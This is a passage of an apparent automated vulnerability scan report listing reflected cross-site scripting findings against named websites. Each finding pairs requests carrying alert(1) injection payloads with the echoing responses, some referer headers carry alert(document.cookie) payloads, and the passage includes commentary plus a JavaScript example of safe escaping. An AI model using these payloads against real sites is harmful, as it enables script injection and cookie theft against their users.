Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9991
Set-Cookie: NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title id="ctl00_htmlTitle">Jones Day Diversity</title>
<link rel="stylesheet"
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?fbc5a'-alert(1)-'5b7885e79b2=1';//]]>
...[SNIP]...

4.41. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into a JavaScript block comment in a response served as application/javascript. The payload a088d<script>alert(1)</script>e11cd877bb9 was submitted in the csid parameter. This input was echoed upper-cased, as K08784A088D<SCRIPT>ALERT(1)</SCRIPT>E11CD877BB9, in the application's response.

Two things weaken this proof of concept as reported. The response is JavaScript rather than HTML and the reflection sits inside a /* */ comment, so the markup is inert unless a browser sniffs the body as HTML; and the application upper-cases the input, so even then ALERT(1) refers to no defined function, since JavaScript identifiers are case-sensitive. The scanner's "Certain" confidence is not supported by this response. Because the reflection is inside a block comment, the check that matters is whether a comment terminator (*/) followed by code is reflected unmodified, which would put the value into script context when gw.js is loaded by a script tag; this report does not show that being tested.

Request

GET /gateway/gw.js?csid=K08784a088d<script>alert(1)</script>e11cd877bb9&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; udm_0=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; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=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; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 19 Jan 2011 18:01:06 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 20 Jan 2011 18:01:06 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Wed, 19 Jan 2011 18:01:05 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "K08784A088D<SCRIPT>ALERT(1)</SCRIPT>E11CD877BB9" was not recognized.
*/

4.42. http://landesm.gfi.com/event-log-analysis-sm/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://landesm.gfi.com
Path:   /event-log-analysis-sm/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed76e'-alert(1)-'ef86bc64d25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /event-log-analysis-smed76e'-alert(1)-'ef86bc64d25/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Wed, 19 Jan 2011 18:09:18 GMT
Server: TornadoServer/1.0
Content-Length: 2205
Connection: Close

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Oops (Error 404) - Performable</title>
<style type="text/css">
body {
font-family:"Lucida Gra
...[SNIP]...
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-10161796-3']);
_gaq.push(['_trackPageview', '/errors/landesm.gfi.com/404/event-log-analysis-smed76e'-alert(1)-'ef86bc64d25/']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-
...[SNIP]...
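
Findings 4.37 through 4.40 and 4.42 share a sink class: a request value concatenated into a quoted JavaScript string literal. The script below, an added example rather than code from sitescout.com or any of the sites above, mirrors the tag.jsp concatenation with the h payload from 4.37, then evaluates the generated script with alert stubbed to see whether the payload runs, and does the same for a hardened version that serializes the values as a JSON object literal with <, > and the U+2028/U+2029 line terminators escaped. The hardened form hands the page a data object and leaves the IFRAME to be built with DOM properties rather than markup strings, which is why it needs only the one encoding.

```javascript
// Added example (not from the scan report or from sitescout.com): the
// tag.jsp concatenation from findings 4.37-4.39 beside a hardened form, both
// evaluated the way a browser evaluates the returned script.

// Vulnerable: the request values are spliced into a single-quoted string
// literal, the shape seen in the tag.jsp response.
function renderTagUnsafe(w, h) {
  return "var out = '<IFRAME WIDTH=\"" + w + "\" HEIGHT=\"" + h + "\">';";
}

// A JavaScript literal for arbitrary data. JSON.stringify handles quotes and
// backslashes; the replace handles what JSON leaves alone but a script sink
// cannot tolerate: '<' and '>' (so the literal can never contain </script>)
// and U+2028/U+2029, which older JavaScript parsers reject inside a literal.
function jsLiteral(value) {
  return JSON.stringify(value).replace(/[<>\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hardened: ship the values as data. The page then sets iframe.width and
// iframe.height from out.w and out.h through DOM properties, so no HTML is
// ever assembled from strings and the only encoding needed is jsLiteral.
function renderTagSafe(w, h) {
  return 'var out = ' + jsLiteral({ w: String(w), h: String(h) }) + ';';
}

// Run generated script with alert() stubbed so we can observe whether the
// payload executed. Returns the stub's verdict and the value of `out`.
function runInSandbox(code) {
  let alerted = false;
  const alertStub = () => { alerted = true; };
  const out = new Function('alert', code + '\nreturn out;')(alertStub);
  return { alerted, out };
}

// The h payload from finding 4.37: closes the quote, runs code, comments out the rest.
const payload = "60071359';alert(1)//beeb76ff9a8";

console.log('unsafe:', runInSandbox(renderTagUnsafe('160', payload)));
console.log('safe:', runInSandbox(renderTagSafe('160', payload)));
```

In the unsafe run the stub fires and `out` holds only the truncated markup; in the safe run nothing fires and `out.h` is the payload, intact, as data. The `<` and `>` escapes are what make the same serializer usable inside an inline `<script>` block like the one in 4.40, where a bare `</script>` in the data would end the element regardless of how well the string literal itself was quoted.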

4.43. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into a JSON object key inside the JSONP response. The payload 10337<script>alert(1)</script>88629374d28 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

As reported this is not an exploitable reflected XSS. The reflection is inside a double-quoted string literal within a JavaScript response that is served with Content-Type: text/javascript and X-Content-Type-Options: nosniff, so a <script> tag there is string data and the browser will not sniff the body as HTML. What would matter is whether a double quote or backslash in slotname can leave the string literal, and this response does not test that; the "High" severity and "Certain" confidence should be read with that in mind.

Request

GET /gampad/ads?correlator=1295452261577&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-6743622525202572&slotname=728x90A_General10337<script>alert(1)</script>88629374d28&page_slots=728x90A_General&cookie_enabled=1&ga_vid=1376446855.1295452262&ga_sid=1295452262&ga_hid=2080119672&url=http%3A%2F%2Fwww.csmonitor.com%2FUSA1edc1%2522-alert(document.cookie)-%25228a5e635d48%2FJustice%2F2011%2F0118%2FSupreme-Court-declines-appeal-of-D.C.-gay-marriage-law&ref=http%3A%2F%2Fburp%2Fshow%2F25&lmt=1295473836&dt=1295452261654&cc=10&biw=950&bih=1012&ifi=1&adk=3889316276&u_tz=-360&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 19 Jan 2011 18:03:28 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2750

GA_googleSetAdContentsBySlotForSync({"728x90A_General10337<script>alert(1)</script>88629374d28":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

4.44. http://rafael.adm.br/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rafael.adm.br
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffb7d"><script>alert(1)</script>21b58676d82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffb7d\\\"><script>alert(1)</script>21b58676d82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The three backslashes are addslashes-style quoting applied twice on the way to the template; as in 4.29 they mean nothing to the HTML parser, so the double quote still terminates the href attribute and the script element is parsed as markup.

Request

GET /?ffb7d"><script>alert(1)</script>21b58676d82=1 HTTP/1.1
Host: rafael.adm.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 19 Jan 2011 16:58:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.10-2ubuntu6
Vary: Cookie
X-Pingback: http://rafael.adm.br/xmlrpc.php
Content-Length: 43014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<a href="http://rafael.adm.br/page/2/?ffb7d\\\"><script>alert(1)</script>21b58676d82=1">
...[SNIP]...

4.45. http://skaddenpractices.skadden.com/fca/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /fca/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f2fa"><script>alert(1)</script>7a7277b34d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fca/?6f2fa"><script>alert(1)</script>7a7277b34d3=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:42 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460882218266; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDEN=f642355c896d83fe703b92dbf7d4cbd0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26018


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - False Claims Act Defense</title>

<link href="scripts/skadden_mini.css" rel="stylesheet
...[SNIP]...
<a href="/fca/index.php?6f2fa"><script>alert(1)</script>7a7277b34d3=1&print=1" target="_blank" onmouseover="tprint.src='images/t-print2.gif';toolbox.src='images/sh-print.gif'" onmouseout="tprint.src='images/t-print1.gif';toolbox.src='images/sh-tools.gif'">
...[SNIP]...

4.46. http://skaddenpractices.skadden.com/hc/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /hc/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6d57"><script>alert(1)</script>5968cea9b03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hc/?b6d57"><script>alert(1)</script>5968cea9b03=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:47 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460887085136; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENHC=81465b85641fb95bc04d846351eba1e0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 40019


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - Health Care</title>

<link href="scripts/skadden_mini.css" rel="stylesheet" type="text/
...[SNIP]...
<a href="/hc/index.php?b6d57"><script>alert(1)</script>5968cea9b03=1&print=1" target="_blank" onmouseover="tprint.src='images/t-print2.gif';toolbox.src='images/sh-print.gif'" onmouseout="tprint.src='images/t-print1.gif';toolbox.src='images/sh-tools.gif'">
...[SNIP]...

4.47. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81116"><script>alert(1)</script>ab7d185670b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sec/?81116"><script>alert(1)</script>ab7d185670b=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:43 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460883243148; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENSEC=93a86fa73ffca397505be2273bb8a129; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21654


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - SEC Enforcement and Compliance</title>

<link href="scripts/skadden_mini.css" rel="styl
...[SNIP]...
<iframe src="/sec/index.php?81116"><script>alert(1)</script>ab7d185670b=1&attorneys=1&inline=1" frameborder="0" scrolling="auto" name="primarycontact" allowtransparency="true" background-color="transparent">
...[SNIP]...

4.48. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae3b"><script>alert(1)</script>cc7c0c0318c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sec/?7ae3b"><script>alert(1)</script>cc7c0c0318c=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:42 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460882882759; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENSEC=31dc20249a9ecac44a1bd41ef91f6911; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21654


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - SEC Enforcement and Compliance</title>

<link href="scripts/skadden_mini.css" rel="styl
...[SNIP]...
<a href="/sec/index.php?7ae3b"><script>alert(1)</script>cc7c0c0318c=1&print=1" target="_blank" onmouseover="tprint.src='images/t-print2.gif';toolbox.src='images/sh-print.gif'" onmouseout="tprint.src='images/t-print1.gif';toolbox.src='images/sh-tools.gif'">
...[SNIP]...

4.49. http://twittercounter.com/embed/ [username parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://twittercounter.com
Path:   /embed/

Issue detail

The value of the username request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe165'%3balert(1)//8402f0b736c was submitted in the username parameter. This input was echoed as fe165';alert(1)//8402f0b736c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/?username=rafaelpfe165'%3balert(1)//8402f0b736c HTTP/1.1
Host: twittercounter.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:03:39 GMT
Server: Apache/2.2.14 (Fedora) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Expires: Sat, 29 Jan 2011 18:03:39 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 448

       <!--
       document.write( '<div id="TwitterCounter"><a href="http://twittercounter.com/rafaelpfe165';alert(1)//8402f0b736c" title="TwitterCounter for @rafaelpfe165';alert(1)//8402f0b736c" target="_blank">
...[SNIP]...

4.50. http://REDACTED/284152846/direct/01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://REDACTED
Path:   /284152846/direct/01

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f21b'%3b3d19e4067f1 was submitted in the REST URL parameter 4. This input was echoed as 7f21b';3d19e4067f1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /284152846/direct7f21b'%3b3d19e4067f1/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic? HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6714
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:59 GMT

<html><head><title>728x90_35_thd_hs_windows_revised</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
<param name="movie" value="HTTP://REDACTED.com/ds/I2IWCTHD1THD/HomeServices/728x90_35_thd_hs_windows_revised.swf?ver=1&clickTag1=!~!click!~!http://REDACTED.com/go/284152846/direct7f21b';3d19e4067f1;ai.196212142;ct.1/01&clickTag=!~!click!~!http://REDACTED.com/go/284152846/direct7f21b';3d19e4067f1;ai.196212142;ct.1/01" />
...[SNIP]...

4.51. http://REDACTED/284152846/direct/01 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://REDACTED
Path:   /284152846/direct/01

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83606"-alert(1)-"a5366a597f2 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?83606"-alert(1)-"a5366a597f2 HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6692
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:39 GMT

<html><head><title>728x90_35_thd_hs_windows_revised</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
2 >= nRequiredVersion);
}
}
}
detectPluginTHD1293044987106();
var _THD1293044987106_Instance =
{
click : "http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?83606"-alert(1)-"a5366a597f2",
clickThruUrl: "http://REDACTED.com/go/284152846/direct;ai.196212142;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click :
...[SNIP]...

4.52. http://REDACTED/284152846/direct/01 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://REDACTED
Path:   /284152846/direct/01

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b235"><script>alert(1)</script>4441186ab6f was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?5b235"><script>alert(1)</script>4441186ab6f HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6767
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:39 GMT

<html><head><title>728x90_35_thd_hs_windows_revised</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
<a target="_blank" href="http://REDACTED.com/go/284152846/direct;ai.196212142;ct.1/01/" onclick="if(\'http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?5b235"><script>alert(1)</script>4441186ab6f\')(new Image).src=\'http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?5b235">
...[SNIP]...

4.53. http://REDACTED/284152846/direct/01 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://REDACTED
Path:   /284152846/direct/01

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0b22'-alert(1)-'7388b2ddfcf was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?c0b22'-alert(1)-'7388b2ddfcf HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
